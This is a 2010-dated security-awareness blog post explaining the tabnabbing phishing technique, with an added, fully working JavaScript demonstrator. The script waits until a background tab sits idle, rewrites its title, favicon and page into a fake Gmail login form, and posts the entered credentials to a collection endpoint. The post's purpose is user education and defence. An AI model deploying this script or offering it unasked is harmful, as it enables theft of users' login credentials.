Thursday, May 27, 2010

Tabnabbing - new phishing technique

Ever walk away from your computer, or change focus to a different application for a while and forget where you were surfing?

Might want to be careful. A new phishing proof of concept, which works in Firefox, Chrome, IE 8 and most other browsers that support basic scripting and tabs, might fool you into thinking you were about to log in to your email account -- or your bank!

It's called Tabnabbing, and a malicious site can use it to rewrite a page you've already left open in a tab so that it looks like your bank, your Gmail account, or even a gaming account login page. (The original proof-of-concept write-up has more detail as well as a harmless working demo of the technique.)


How The Attack Works

1. A user navigates to your normal-looking site.

2. You detect when the page has lost its focus and hasn’t been interacted with for a while.

3. Replace the favicon with the Gmail favicon, the title with “Gmail: Email from Google”, and the page with a Gmail login look-alike. This can all be done with just a little bit of JavaScript and takes place instantly.

4. As the user scans their many open tabs, the favicon and title act as a strong visual cue—memory is malleable and moldable and the user will most likely simply think they left a Gmail tab open. When they click back to the fake Gmail tab, they’ll see the standard Gmail login page, assume they’ve been logged out, and provide their credentials to log in. The attack preys on the perceived immutability of tabs.

5. After the user has entered their login information and you’ve sent it back to your server, you redirect them to Gmail. Because they were never logged out in the first place, it will appear as if the login was successful.
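The five steps above, worked through as an added example in plain JavaScript. This is not code from the original post or from the proof-of-concept it describes: the decision logic is kept separate from the DOM so it can be exercised outside a browser, and attach() wires it to a real document. The decoy title, the favicon path, the /collect form action and the 5-second idle threshold are all constructed for illustration.

```javascript
// Tabnabbing demonstrator (added example, not the original post's code).
// Step 1: the victim lands on an ordinary-looking page served by the attacker.
// Step 2: onBlur()/onActivity() track whether the tab is unattended.
// Step 3: swap() rewrites title, favicon and body in one go.
// Step 5: the decoy form posts to the attacker, who then sends the victim on
//         to the real site (or restore() puts the original page back).

// Constructed look-alike content. A real attack would use a faithful copy of
// the target's login page; the favicon path and /collect endpoint are hypothetical.
const DECOY = {
  title: "Gmail: Email from Google",
  faviconHref: "/decoy/gmail-favicon.ico",
  bodyHtml:
    '<form id="login" action="/collect" method="post">' +
    'Email <input name="Email"><br>' +
    'Password <input name="Passwd" type="password"><br>' +
    "<button>Sign in</button></form>",
};

// A "page" is any object exposing title, faviconHref and bodyHtml as plain
// properties; attach() builds one from a real document.
class Tabnabber {
  constructor(page, { idleMs = 5000, now = Date.now } = {}) {
    this.page = page;
    this.idleMs = idleMs;
    this.now = now;          // injectable clock, so the logic can be driven deterministically
    this.original = { title: page.title, faviconHref: page.faviconHref, bodyHtml: page.bodyHtml };
    this.blurredAt = null;   // timestamp the tab lost focus, or null while attended
    this.swapped = false;
  }

  // The tab went into the background: start the idle clock.
  onBlur() {
    if (!this.swapped && this.blurredAt === null) this.blurredAt = this.now();
  }

  // Any interaction (focus, mouse, keyboard, scroll) means the user is still
  // looking: cancel the pending swap. Once swapped, nothing is undone.
  onActivity() {
    if (!this.swapped) this.blurredAt = null;
  }

  // Called periodically. Returns true exactly once, at the moment of the swap.
  tick() {
    if (this.swapped || this.blurredAt === null) return false;
    if (this.now() - this.blurredAt < this.idleMs) return false;
    this.swap();
    return true;
  }

  // Everything the user sees in the tab strip and in the page changes at once.
  // Note what does NOT change: the URL shown in the address bar.
  swap() {
    this.page.title = DECOY.title;
    this.page.faviconHref = DECOY.faviconHref;
    this.page.bodyHtml = DECOY.bodyHtml;
    this.swapped = true;
  }

  // Put the original page back (the other option after harvesting is a
  // redirect to the real site, so the victim appears to have logged in).
  restore() {
    Object.assign(this.page, this.original);
    this.blurredAt = null;
    this.swapped = false;
  }
}

// Browser glue: wrap document as a "page" and hook the events. Only runs
// where a DOM exists; in a harmless demo the decoy form would post nowhere.
function attach(doc, win, opts) {
  let icon = doc.querySelector("link[rel~='icon']");
  if (!icon) {
    icon = doc.createElement("link");
    icon.rel = "icon";
    doc.head.appendChild(icon);
  }
  const page = {
    get title() { return doc.title; },
    set title(t) { doc.title = t; },
    get faviconHref() { return icon.href; },
    set faviconHref(h) { icon.href = h; },
    get bodyHtml() { return doc.body.innerHTML; },
    set bodyHtml(h) { doc.body.innerHTML = h; },
  };
  const nabber = new Tabnabber(page, opts);
  win.addEventListener("blur", () => nabber.onBlur());
  for (const ev of ["focus", "mousemove", "keydown", "scroll"]) {
    win.addEventListener(ev, () => nabber.onActivity());
  }
  win.setInterval(() => nabber.tick(), 1000);
  return nabber;
}

if (typeof document !== "undefined" && typeof window !== "undefined") {
  attach(document, window, { idleMs: 5000 });
}
```

Two things worth noticing. Nothing here exploits a bug in the browser or in the impersonated site; it is pure same-origin DOM manipulation on the attacker's own page, which is why every scripting-capable browser is affected. And the one thing the script cannot touch is the domain in the address bar, which is the check a user actually has. Some browsers only pick up a new favicon when the link element is replaced rather than edited in place; attach() edits in place for brevity.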


You know the drill by now: inform your friends, parents, siblings, co-workers and make sure that official-looking login page to which you're about to respond is one YOU pulled up - not one that just happened to be there when you got back from that bio-break. And look at the address bar before you type: a page can change its own title, favicon and contents, but it cannot make the browser show the real site's domain.

UPDATE: If you use Firefox with NoScript, a recent version of NoScript includes an experimental tabnabbing blocker.
